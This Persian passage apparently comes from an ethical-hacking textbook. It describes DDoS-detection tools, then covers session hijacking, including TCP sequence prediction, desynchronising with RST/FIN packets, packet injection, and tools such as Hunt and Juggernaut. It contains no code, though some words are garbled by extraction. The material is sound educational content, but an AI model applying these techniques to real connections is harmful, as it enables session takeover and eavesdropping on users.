SARA ، ﺑﺎ آزﻣﺎﻳﺶ ﺳﺮوﻳﺲ ﻫﺎي ﺷﺒﻜﻪ اي، اﻃﻼﻋﺎﺗﻲ درﺑﺎره ﻣﺎﺷﻴﻦ ﻫﺎ و ﺷﺒﻜﻪ ﻫﺎي راه دور ﺟﻤﻊ آوري ﻣﻲ ﻛﻨﺪ . اﻳﻦ ا ﺑﺰار ﺷﺎﻣﻞ اﻃﻼﻋﺎﺗﻲ درﺑﺎره ﺳﺮوﻳﺲ ﻫﺎي ﺷﺒﻜﻪ اي و آﺳﻴﺐ ﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺎﻟﻘﻮه از ﻗﺒﻴﻞ ﭘﻴﻜﺮﺑﻨﺪي ﻧﺎدرﺳﺖ ﺳﺮوﻳﺲ ﻫﺎ، ﻣﺸﻜﻼت ﺷﻨﺎﺧﺘﻪ ﺷﺪه ﻧﺮم اﻓﺰارﻫﺎي ﺳﻴﺴﺘﻤﻲ ﻳﺎ ﺷﺒﻜﻪ اي اراﺋﻪ ﻣﻲ دﻫﺪ . .

RID ، اﺑﺰار ي راﻳﮕﺎن ﺑﺮاي اﺳﻜﻦ اﺳﺖ ﻛﻪ وﺟﻮد ﻛﻼﻳﻨﺖ ﻫﺎي TFN ، Trinoo ، ﻳﺎ Stacheldraht را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . .

Zombie Zapper ، روال ﻫﺎ و روﺗﻴﻦ ﻫﺎي zombie را ﺑﻪ ﺣﺎﻟﺖ ﺧﻮاب ( sleep ) ﻣﻲ ﺑﺮد ﺑﻨﺎﺑﺮاﻳﻦ، ﺣﻤﻠﻪ آﻧﻬﺎ را ﻣﺘﻮﻗﻒ ﻣﻲ ﻛﻨﺪ . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از ﻫﻤﺎن دﺳﺘﻮرات ﻫﻜﺮ ﺑﺮاي ﻣﺘﻮﻗﻒ ﻛﺮدن ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

Session Hijacking

Session hijacking ، زﻣﺎﻧﻲ اﺳﺖ ﻛﻪ ﻫﻜﺮ، ﻛﻨﺘﺮل ﻧﺸﺴﺖ ﻛﺎرﺑﺮ را ﭘﺲ از اﺣﺮاز ﻫﻮﻳﺖ ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ او ﺑﺎ ﺳﺮور، ﺑﺪﺳﺖ ﻣﻲ ﮔﻴﺮد . Session hijacking ، ﺣﻤﻠﻪ اي اﺳﺖ ﻛﻪ ID ﻧﺸﺴﺖ ﻫﺎي ﺟﺎري ارﺗﺒﺎﻃﺎت ﻛﻼﻳﻨﺖ و ﺳﺮور را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ و ﻧﺸﺴﺖ ﻛﺎرﺑﺮ را ﻣﻲ دزد . Session hijacking ، ﺑﺎ اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﭘﻴﺸﮕﻮﻳﻲ sequence number را اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ، ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

132

Spoofing و Hijacking

ﺣﻤﻼت spoofing ، ﺑﺎ ﺣﻤﻼت hijacking ﺗﻔﺎوت دار ﺪﻧ . در ﺣﻤﻠﻪ spoofing ، ﻫﻜﺮ اﺳﺘﺮاق ﺳﻤﻊ ﻣﻲ ﻛﻨﺪ و ﺑﻪ ﺗﺮاﻓﻴﻜﻲ ﻛﻪ از ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻋﺒﻮر داده ﻣﻲ ﺷﻮد ﮔﻮش ﻣﻲ ﻛﻨﺪ ﺳﭙﺲ از اﻳﻦ اﻃﻼﻋﺎت ﺟﻤﻊ آوري ﺷﺪه ﺑﺮاي spoof ﻳﺎ ﺑﺮاي اﺳﺘﻔﺎده از آدرس ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺸﺮوع اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ( ﺷﻜﻞ زﻳﺮ ) . . )

اﻣﺎ hijacking ، ﺑﺮاي آﻓﻼﻳﻦ ﻛﺮدن ﻛﺎرﺑﺮ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ اﺳﺖ . ﻫﻜﺮ، ﺑﻪ ﻛﺎرﺑﺮ ﻣﺸﺮوع اﺳﺘﻨﺎد ﻣﻲ ﻛﻨﺪ ﺗﺎ ارﺗﺒﺎط را ﺗﺸﻜﻴﻞ دﻫﺪ و اﺣﺮاز ﻫﻮﻳﺖ ﻛﻨﺪ ﭘﺲ از آن، ﻫﻜﺮ ﺸﻧ ﺴﺖ را ﺑﻪ دﺳﺖ ﻣﻲ ﮔﻴﺮد و ﻧﺸﺴﺖ ﻛﺎرﺑﺮ ﻣﺸﺮوع ، ﻗﻄﻊ ﻣﻲ ﺷﻮد ( ﺷﻜﻞ زﻳﺮ .) .)

133

ﺑﺮاي داﺋﻤﻲ ﻛﺮدن ﻳﻚ ﺣﻤﻠﻪ، Session hijacking ، ﺳﻪ ﻣﺮﺣﻠﻪ :دراد :دراد

ردﮔﻴﺮي ﻧﺸﺴﺖ: ﻫﻜﺮ، ﻧﺸﺴﺖ ﺑﺎز را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ و sequence number ﺑﺴﺘﻪ ﺑﻌﺪي را ﭘﻴﺶ ﺑﻴﻨﻲ ﻣﻲ ﻛﻨﺪ . .

ﻏﻴﺮ ﻫﻤﺰﻣﺎن ﻛﺮدن ارﺗﺒﺎط: ﻫﻜﺮ، ﻳﻚ ﺑﺴﺘﻪ RST ﻳﺎ FIN را ﺑﻪ ﺳﻴﺴﺘﻢ ﻛﺎرﺑﺮ ﻣﺸﺮوع ﻣﻲ ﻓﺮﺳﺘﺪ ﺗﺎ ﻧﺸﺴﺖ آﻧﻬﺎ ﺑﺴﺘﻪ ﺷﻮد . .

ﺗﺰرﻳﻖ ﺑﺴﺘﻪ ﻫﻜﺮ: ﻫﻜﺮ، ﻳﻚ ﺑﺴﺘﻪ TCP ﺑﺎ sequence number ﭘﻴﺸ ﮕﻮﻳﻲ ﺷﺪه، ﺑﻪ ﺳﺮور ارﺳﺎل ﻣﻲ ﻛﻨﺪ و ﺳﺮور، آن را ﺑﻪ ﻋﻨﻮان ﺑﺴﺘﻪ ﺑﻌﺪي ﻛﺎرﺑﺮ ﻣﺸﺮوع ﻣﻲ ﭘﺬﻳﺮد . .

اﻧﻮاع session hijacking

ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ از دو ﻧﻮع Session hijacking اﺳﺘﻔﺎده ﻛﻨﻨﺪ : اﻛﺘﻴﻮ و ﭘﺴﻴﻮ . اوﻟﻴﻦ ﺗﻔﺎوت ﺑﻴﻦ آﻧﻬﺎ ﺳﻄﺢ درﮔﻴﺮي ﻫﻜﺮ در ﻧﺸﺴﺖ اﺳﺖ . در ﺣﻤﻠﻪ اﻛﺘﻴﻮ، ﻫﻜﺮ ﺑﻪ دﻧﺒﺎل ﻧﺸﺴﺖ ﻓﻌﺎل اﺳﺖ و ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎﻳﻲ ﻛﻪ sequence number را در ﻧﺸﺴﺖ ﻫﺎي TCP ، ﭘﻴﺸﮕﻮﻳﻲ ﻣﻲ ﻛﻨﻨﺪ، ﻧﺸﺴﺖ را ﺑﺪﺳﺖ ﻣﻲ ﮔﻴﺮد . .

در ﺣﻤﻠﻪ ﭘﺴﻴ ﻮ، ﻫﻜﺮ، زﻣﺎﻧﻴﻜﻪ ﺗﺮاﻓﻴﻚ ﻲﻟﺎﺳرا ﻮﺗ ﺳﻂ ﻛﺎرﺑﺮ ﻣﺸﺮوع را ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ ، ﻧﺸﺴﺖ را ﺑﺪﺳﺖ ﻣﻲ ﮔﻴﺮد . ﺣﺎﻟﺖ ﭘﺴﻴﻮ، ﻣﺜﻞ اﺳﺘﺮاق ﺳﻤﻊ اﺳﺖ . ﺑﺮاي ﺟﻤﻊ اوري اﻃﻼﻋﺎﺗﻲ از ﻗﺒﻴﻞ ﭘﺴﻮردﻫﺎ و ﺳﭙﺲ اﺳﺘﻔﺎده از آن اﻃﻼﻋﺎت ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﺑﻪ ﻋﻨﻮان ﻳﻚ اﻳﺠﺎد ﻳﻚ ﻧﺸﺴﺖ ﺟﺪاﮔﺎﻧﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

134

ﻣﻔﺎﻫﻴﻢ TCP : دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي ﻳﻜﻲ از ﻗﺎﺑﻠﻴﺖ ﻫﺎي TCP ، ﻗﺎﺑﻠﻴﺖ اﻋﺘﻤﺎد و ﺗﺤﻮﻳﻞ ﺑﺴﺘﻪ ﻫﺎ اﺳﺖ . ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر، TCP از ﺑﺴﺘﻪ ﻫﺎي ACK و sequence number ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . دﺳﺘﻜﺎري اﻳﻦ ﺷﻤﺎره ﻫﺎ، اﺻﻮل TCP session hijacking اﺳﺖ . ﺑﺮاي درك اﻳﻦ ﻣﻮﺿﻮع، اﺟﺎزه دﻫﻴﺪ ﻧﮕﺎﻫﻲ ﺑﻪ دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي TCP داﺷﺘﻪ ﺑﺎﺷﻴﻢ : : .1 ﻛﺎرﺑﺮ ﻣﺸﺮ وع، ارﺗﺒﺎﻃﻲ را ﺑﺎ ﺳﺮور ﺷﺮوع ﻣﻲ ﻛﻨﺪ . اﻳﻨﻜﺎر ﺑﺎ ارﺳﺎل ﺑﺴﺘﻪ ﺑﺎ ﺑﻴﺖ SYN و sequence number آﻏﺎزﻳﻦ ( ISN ) از ﻃﺮف ﻛﺎرﺑﺮ ﻣﺸﺮوع ﺑﻪ ﺳﻤﺖ ﺳﺮور اﻧﺠﺎم ﻣﻲ ﮔﻴﺮد. .2 ﺳﺮور، اﻳﻦ ﺑﺴﺘﻪ را درﻳﺎﻓﺖ ﻣﻲ ﻛﻨﺪ و در ﭘﺎﺳﺦ، ﺑﺴﺘﻪ اي را ﺑﺎ ﺑﻴﺖ SYN و ISBN ﺑﻪ ﻋﻼوه ﺑﻴﺖ ACK ﻛﻪ ﻣﻘﺪار sequence number آن ﻳﻚ واﺣﺪ اﻓﺰاﻳﺶ ﻳﺎﻓﺘﻪ اﺳﺖ، ارﺳﺎل ﻣﻲ ﻛﻨﺪ. .3 ﻛﺎرﺑﺮ ﻣﺸﺮوع ، ﺑﺎزﺧﻮردي ﺑﻪ ﺳﺮور ﺑﺎ ﺑﺮﮔﺸﺖ ﺑﺴﺘﻪ ﺑﺎ ﺑﻴﺖ ACK و اﻓﺰاﻳﺶ sequence number ، ﻣﻲ دﻫﺪ.

اﻳﻦ ارﺗﺒﺎط ﻣﻲ ﺗﻮاﻧﺪ از ﻫﺮ دو ﻃﺮف ﺑﻪ ﻋﻠﺖ timeout ، ﻳﺎ درﻳﺎﻓﺖ ﺑﺴﺘﻪ ﺑﺎ flag ﻫﺎي FIN ﻳﺎ RST ، ﺑﺴﺘﻪ ﺷﻮد . .

زﻣﺎﻧﻴﻜﻪ ﺑﺴﺘﻪ اي ﺑﺎ ﺑﻴﺖ RST ، درﻳﺎﻓﺖ ﺷﺪ، ﺳﻴﺴﺘﻢ درﻳﺎﻓﺖ ﻛﻨﻨﺪه، ارﺗﺒﺎط را ﻣﻲ ﺑﻨﺪد و ﻫﺮ ﺑﺴﺘﻪ ورودي ﺑﺮاي ﻧﺸﺴﺖ، رد ﻣﻲ ﺷﻮد . اﮔﺮ ﺑﻴﺖ FIN در ﺑﺴﺘﻪ وﺟﻮد داﺷﺘﻪ ﺑﺎﺷﺪ، ﺳﻴﺴﺘﻢ درﻳﺎﻓﺖ ﻛﻨﻨﺪه، ﺑﻪ ﻓﺮآﻳﻨﺪ ﻗﻄﻊ ﻛﺮدن ارﺗﺒﺎط ﻣﻲ رود و ﻫﺮ ﺑﺴﺘﻪ اي ﻛﻪ در زﻣﺎن ﺑﺴﺘﻦ ﻓﺮآﻳﻨﺪ درﻳﺎﻓﺖ ﻣﻲ ﺷﻮد، ﻫﻨﻮز ﭘﺮدازش ﻣﻲ ﺷﻮد . ارﺳﺎل ﻳﻚ ﺑﺴﺘﻪ ﺑﺎ ﺑﻴﺖ ﻫﺎي FIN ﻳﺎ RST ، راﻳﺞ ﺗﺮﻳﻦ روش ﺑﺮاي ﻫﻜﺮﻫﺎ ﺑﺮاي ﺑﺴﺘﻦ ﻧﺸﺴﺖ ﻛﻼﻳﻨﺖ ﺑﺎ ﺳﺮور و ﮔﺮﻓﺘﻦ ﻧﺸﺴﺖ ﺑﻪ ﻋﻨﻮان ﻛﺎرﺑﺮ اﺳﺖ . .

ﭘﻴﺸ ﮕﻮﻳﻲ sequence

TCP ، ﭘﺮوﺗﻜﻠﻲ اﺗﺼﺎل ﮔﺮا و ﻣﺴﺌﻮل ﺟﻤﻊ آوري دوﺑﺎره ﺑﺴﺘﻪ ﻫﺎ ﻃﺒﻖ ﺗﺮﺗﻴﺐ اﺻﻠﻲ آﻧﻬﺎﺳﺖ . ﺑﻨﺎﺑﺮاﻳﻦ، ﻫﺮ ﺑﺴﺘﻪ ﺑﺎﻳﺪ ﻳﻚ ﻋﺪد ﻣﻨﺤﺼﺮﺑﻔﺮد داﺷﺘﻪ ﺑﺎﺷﺪ اﻳﻦ ﻋﺪد ﺑﺎ ﻧﺎم SN ) sequence number ) ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . ﻫﺮ ﺑﺴﺘﻪ، ﺑﺎﻳﺪ ﻳﻚ ﺷﻤﺎره ﻣﻨﺤﺼﺮﺑﻔﺮد ﺑﺮاي ﻧﺸﺴﺖ داﺷﺘﻪ ﺑﺎﺷ ﺪ ﺗﺎ ﺟﻤﻊ آوري دوﺑﺎر ه ﺑﺴﺘﻪ ﻫﺎ ، اﻣﻜﺎن ﭘﺬﻳﺮ ﺑﺎﺷﺪ . اﮔﺮ ﺑﺴﺘﻪ ﻫﺎ ﺑﺼﻮرت ﻏﻴﺮ ﻣﻨﻈﻢ درﻳﺎﻓﺖ ﺷﻮﻧﺪ، از sequence number ﺑﺮاي اﺻﻼح ﺑﺴﺘﻪ ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻫﻤﺎﻧﻄﻮرﻳﻜﻪ ﻗﺒﻼ ﺗﻮﺿﻴﺢ داده ﺷﺪ، ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﻧﺸﺴﺖ TCP را آﻏﺎز ﻣﻲ ﻛﻨﺪ، ﺑﺴﺘﻪ اي را ﺑﺎ ﺑﻴﺖ SYN ارﺳﺎل ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﺑﺴﺘﻪ ﺑﺎ ﻧﺎم synchronizing ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد و داراي sequence number آﻏﺎزﻳﻦ ﻛﻼﻳﻨﺖ ( ISN ) اﺳﺖ . ISN ﻋﺪدي اﺳﺖ ﻛﻪ ﺑﻪ ﺻﻮرت ﺗﺼﺎدﻓﻲ ﺗﻮﻟﻴﺪ ﻣﻲ ﺷﻮد و 4 ﻣﻴﻠﻴﺎرد ﺗﺮﻛﻴﺐ ﻣﺨﺘﻠﻒ دارد وﻟﻲ ﻫﻨﻮز اﺣﺘﻤﺎل ﺗﻜﺮار وﺟﻮد دارد . .

زﻣﺎﻧﻴﻜﻪ ﺑﺴﺘﻪ ACK ارﺳﺎل ﺷﺪ، ﻫﺮ ﻣﺎﺷﻴﻦ از sequence number ﺑﺴﺘﻪ اي ﻛﻪ درﻳﺎﻓﺖ ﻛﺮده اﺳﺖ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و ﻋﺪدي را ﺑﻪ آن اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﻪ ﺗﻨﻬﺎ درﻳﺎﻓﺖ ﺑﺴﺘﻪ ﻫﺎ را ﺗﺎﺋﻴﺪ ﻣﻲ ﻛﻨﺪ ﺑﻠﻜﻪ sequence number ﺑﺴﺘﻪ ﺑﻌﺪي را ﻫﻢ ﺑﻪ ارﺳﺎل ﻛﻨﻨﺪه آن ﻣﻲ دﻫﺪ . ﺑﺎ دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي، ﻣﻘﺪار اﻓﺰاﻳﺸﻲ، 1 اﺳﺖ . در ارﺗﺒﺎﻃﺎت ﻃﺒﻴﻌﻲ داده ﻫﺎ، ﻣﻘ ﺪار اﻓﺰاﻳﺶ، ﺑﺮاﺑﺮ اﻧﺪازه داده ﻫﺎ ﺑﻪ ﺑﺎﻳﺖ اﺳﺖ ( ﺑﺮاي ﻣﺜﺎل اﮔﺮ ﺷﻤﺎ 45 ﺑﺎﻳﺖ داده ارﺳﺎل ﻛﻨﻴﺪ، ﭘﺎﺳﺦ ﻫﺎي ACK ﺑﺎ اﺳﺘﻔﺎده از sequence number ﺑﺴﺘﻪ ﻫﺎي درﻳﺎﻓﺘﻲ ﺑﻪ ﻋﻼوه 45 ﺧﻮاﻫﺪ ﺑﻮد .) .) 135

ﺷﻜﻞ زﻳﺮ، sequence number ﻫﺎ و ﺑﺎزﺧﻮردﻫﺎﻳﻲ ﻛﻪ در دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي TCP اﺳﺘﻔﺎده ﻣ ﻲ ﺷﻮﻧﺪ را ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ : :

اﺑﺰارﻫﺎي ﻫﻚ ﻛﻪ ﺑﺮاي session hijacking اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ، sequence number را ﭘﻴﺸﮕﻮﻳﻲ ﻣﻲ ﻛﻨﻨﺪ . ﺑﺮاي اﻧﺠﺎم ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ ﺣﻤﻠﻪ TCP sequence prediction ، ﻫﻜﺮ ﺑﺎﻳﺪ ﺗﺮاﻓﻴﻚ ﺑﻴﻦ دو ﺳﻴﺴﺘﻢ را sniff ﻛﻨﺪ . ﺳﭙﺲ، ﻫﻜﺮ ﻳﺎ اﺑﺰار ﻫﻚ ﺑﺎﻳﺪ sequence number را ﺣﺪس ﺑﺰﻧﺪ . اﻳﻨ ﻜﺎر ﺑﺴﻴﺎر دﺷﻮار اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺴﺘﻪ ﻫﺎ ﺑﻪ ﺳﺮﻋﺖ ﺟﺎﺑﺠﺎ ﻣﻲ ﺷﻮﻧﺪ . .

136

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ ارﺗﺒﺎط را sniff ﻛﻨﺪ، ﺣﺪس sequence number ، ﺑﺴﻴﺎر دﺷﻮار ﻣﻲ ﮔﺮدد . ﺑﺮاي اﻳﻨﻜﻪ ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي session hijacking ، داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ اﺳﺘﺮاق ﺳ ﻤﻊ ﺑﺴﺘﻪ ﻫﺎ را اﻣﻜﺎن ﭘﺬﻳﺮ ﻣﻲ ﻧﺳﺎز ﺪ ﻧﺳﺎز ﺗﺎ sequence number ﻫﺎ را ﻣﺸﺨﺺ ﻛﻨﻨﺪ . .

ﻫﻜﺮﻫﺎ، ﺑﺎ اﺳﺘﻔﺎده از آدرس ﻫﺎي IP ﺟﻌﻠﻲ ( spoofed ) ﺳﻴﺴﺘﻢ، ﻛﻪ ﻧﺸﺴﺘﻲ ﺑﺎ ﺳﻴﺴﺘﻢ ﻫﺪف دارد، ﺑﺴﺘﻪ ﻫﺎﻳﻲ ﺗﻮﻟﻴﺪ ﻣﻲ ﺪﻨﻛﻨ . اﺑﺰارﻫﺎي ﻫﻚ ، ﺑﺴﺘﻪ ﻫﺎﻳﻲ ﺑﺎ sequence number ﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﻫﺪف اﻧﺘﻈﺎر دارد، ﺻﺎدر ﻣﻲ ﻛﻨﺪ . اﻣﺎ ﺑﺎﻳﺪ ﻗﺒﻞ از ارﺳﺎل ﺑﺴﺘﻪ ﻫﺎي ﺳﻴﺴﺘﻢ ﻣﻮرد اﻋﺘﻤﺎد، ﺑﺴﺘﻪ ﻫﺎي ﻫﻜﺮ ﻓﺮﺳﺘﺎده ﺷﻮ ﺪﻧ . اﻳﻨﻜﺎر ﺑﺎ flood ﻛﺮدن ( ﺳﺮازﻳﺮ ﻛﺮدن ) ﺑﺴﺘﻪ ﻫﺎ ﻳﺎ ارﺳﺎل ﺑﺴﺘﻪ RST ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮرد اﻋﺘﻤﺎد اﻧﺠﺎم ﻣﻲ ﺷﻮد . .

ﭼﻪ ﻣﺮاﺣﻠﻲ در session hijacking اﻧﺠﺎم ﻣﻲ ﺷﻮﻧﺪ؟

ﺑﻄﻮر ﺧﻼﺻﻪ، session hijacking ، ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﻪ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ اﺳﺖ : :

ردﮔﻴﺮي ﻧﺸﺴﺖ: ﻫﻜﺮ، ﻳﻚ ﻧﺸﺴﺖ ﺑﺎز را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ و sequence number ﺑﺴﺘﻪ ﺑﻌﺪي را ﭘﻴﺸﮕﻮﻳﻲ ﻣﻲ ﻛﻨﺪ . .

ﻏﻴﺮ ﻫﻤﺰﻣﺎن ﻛﺮدن ارﺗﺒﺎط: ﻫﻜﺮ ﻳﻚ ﺑﺴﺘﻪ TCP ﺑﺎ ﺑﻴﺖ RST ﻳﺎ FIN ﺑﻪ ﻛﺎرﺑﺮ ﻣﺸﺮوع ﻣﻲ ﻓﺮﺳﺘﺪ ﺗﺎ ﻧﺸﺴﺖ آﻧﻬﺎ را ﺑﺒﻨﺪد . ﺑﻪ ﻋﻨﻮان ﺟﺎﻳﮕﺰﻳﻦ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از اﺑﺰار DoS ﺑﺮاي ﻗﻄﻊ ارﺗﺒﺎط ﻛﺎرﺑﺮ از ﺳﺮور اﺳﺘﻔﺎده ﻛﻨﺪ . .

ﺗﺰرﻳﻖ ﺑﺴﺘﻪ ﻫﻜﺮ: ﻫﻜﺮ، ﻳﻚ ﺑﺴﺘﻪ TCP را ﺑﺎ sequence number ﭘﻴﺸﮕﻮﻳﻲ ﺷﺪه، ﺑﻪ ﺳﺮور ارﺳﺎل ﻣﻲ ﻛﻨﺪ و ﺳﺮور آن را ﺑﻪ ﻋﻨﻮان ﺑﺴﺘﻪ ﺑﻌﺪي ﻛﺎرﺑﺮ ﻣﺸﺮوع ﻣﻲ ﭘﺬﻳﺮد . . 137

ﺳﻄﻮح session hijacking : :

Network Level Hijacking • Application Level Hijacking •

TCP/IP Hijacking

TCP/IP hijacking ، ﻳﻚ ﺗﻜﻨﻴﻚ ﻫﻚ اﺳﺖ ﻛﻪ از ﺑﺴﺘﻪ ﻫﺎي ﺟﻌﻠﻲ ﺑﺮاي ﺑﻪ دﺳﺖ ﮔﺮﻓﺘﻦ ﻳﻚ ﻧﺸﺴﺖ ﺑﻴﻦ ﻗﺮﺑﺎﻧﻲ و ﻣﺎﺷﻴﻦ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ارﺗﺒﺎط ﻗﺮﺑﺎﻧﻲ، ﻣﻌﻠﻖ ﻣﻲ ﺷﻮد و ﺳﭙﺲ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ ﻣﺎﺷﻴﻦ ﻫﺎﺳﺖ ارﺗﺒﺎط ﺑﺮﻗﺮار ﻛﻨﺪ . ﺑﺮاي اﻧﺠﺎم اﻳﻦ ﺣﻤﻠﻪ، ﺑﺎﻳﺴﺘﻲ ﻫﻜﺮ ﻣﺜﻞ ﻗﺮﺑﺎﻧﻲ در ﻫﻤﺎن ﺷﺒﻜﻪ ﺑﺎﺷﺪ . ﻣﺎﺷﻴﻦ ﻫﺎي ﻫﺪف و ﻗﺮﺑﺎﻧﻲ ﻫﺮ ﺟﺎﻳﻲ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺎﺷﻨﺪ . .

138

RST Hijacking

RST hijacking ، ﺗﺰرﻳﻖ ﻳﻚ ﺑﺴﺘﻪ reset ) RST ) اﺳﺖ . آدرس ﻣﻨﺒﻊ را ﺟﻌﻞ ﻣﻲ ﻛﻨﺪ و ACK number را ﭘﻴﺸﮕﻮﻳﻲ ﻣﻲ ﻛﻨﺪ . ﻗﺮﺑﺎﻧﻲ ﺧﻴﺎل ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻨﺒﻊ، ﺑﺴﺘﻪ reset را ارﺳﺎل ﻛﺮده اﺳﺖ و ﺑﻨﺎﺑﺮاﻳﻦ ارﺗﺒﺎط را رﻳﺴﺖ ﺧﻮاﻫﺪ ﻛﺮد . .

Blind Hijacking

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ در ﻧﺸﺴﺖ TCP ، داده ﻫﺎي ﻣﺨﺮب ﻳﺎ دﺳﺘﻮرات را ﺑﻪ داﺧﻞ ارﺗﺒﺎﻃﺎت ﺗﺰرﻳﻖ ﻛﻨﺪ ﺣﺘﻲ اﮔﺮ ﻣﺴﻴﺮﻳﺎﺑﻲ ﻣﺒﺪا ( source routing) ، ﻏﻴﺮ ﻓﻌﺎل ﺷﺪه ﺑﺎﺷﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ داده ﻫﺎ ﻳﺎ دﺳﺘﻮرات را ارﺳﺎل ﻛﻨﺪ اﻣﺎ ﻧﻤﻲ ﺗﻮاﻧﺪ ﭘﺎﺳﺦ ﻫﺎ را ﺑﺒﻴﻨﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ Juggernaut ، ﻳﻚ sniffer ﺷﺒﻜﻪ اﺳﺖ ﻛﻪ ﺑﺮاي دزدي ﻧﺸﺴﺖ ﻫﺎي hijack TCP session ) TCP ) اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . . ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻟﻴﻨﻮﻛﺲ اﺟﺮا ﻣﻲ ﺷﻮد و ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي دﻳﺪن ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﺷﻮد ﻳﺎ ﻣﻲ ﺗﻮاﻧﺪ ﻛﻠﻤﻪ ﻛﻠﻴﺪي ﻣﺜﻞ " ﭘﺴﻮرد" را ﺑﮕﻴﺮد و آن را ﺟﺴﺘﺠﻮ ﻛﻨﺪ . اﻳﻦ ﺑﺮﻧﺎﻣﻪ، ﺗﻤﺎم ارﺗﺒﺎﻃﺎت ﻓﻌﺎل ﺷﺒﻜﻪ را ﻧﺸﺎن ﻣﻲ دﻫﺪ و ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻜﻲ از ﻧﺸﺴﺖ ﻫﺎ را ﺑﺮاي hijacking اﻧﺘﺨﺎب ﻛﻨﺪ . .

Hunt ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﺑﺮاي اﺳﺘﺮاق ﺳﻤﻊ و دزدي ﻧﺸﺴﺖ ﻫﺎ ﺑﺮ روي ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . Hunt ، ﻣﻲ ﺗﻮاﻧﺪ ﻣﺪﻳﺮﻳﺖ ارﺗﺒﺎﻃﺎت، ARP spoofing ، رﻳﺴﺖ ﻛﺮدن ارﺗﺒﺎﻃﺎت، ﻣﺎﻧﻴﺘﻮر ﻛﺮدن ارﺗﺒﺎﻃﺎت، ﻛﺸﻒ MAC address ﻫﺎ، و اﺳﺘﺮاق ﺳﻤﻊ ﺗﺮاﻓﻴﻚ TCP را اﻧﺠﺎم دﻫﺪ . .

139

TTYWatcher ، اﺑﺰاري ﺑﺮاي session hijacking اﺳﺖ ﻛﻪ ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﺗﺎ ﻧﺸﺴﺖ دزدﻳﺪه ﺷﺪه را دوﺑﺎره ﺑﻪ ﻛﺎرﺑﺮ ﻣﺸﺮوع ﺑﺮﮔﺮداﻧﺪ ﺑﻪ ﻃﻮرﻳﻜﻪ ﮔﻮﻳﺎ اﺻﻼ دزدﻳﺪه ﻧﺸﺪه ﺑﻮد . اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺗﻨﻬﺎ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻫﺎي Sun Solaris اﺳﺖ . .

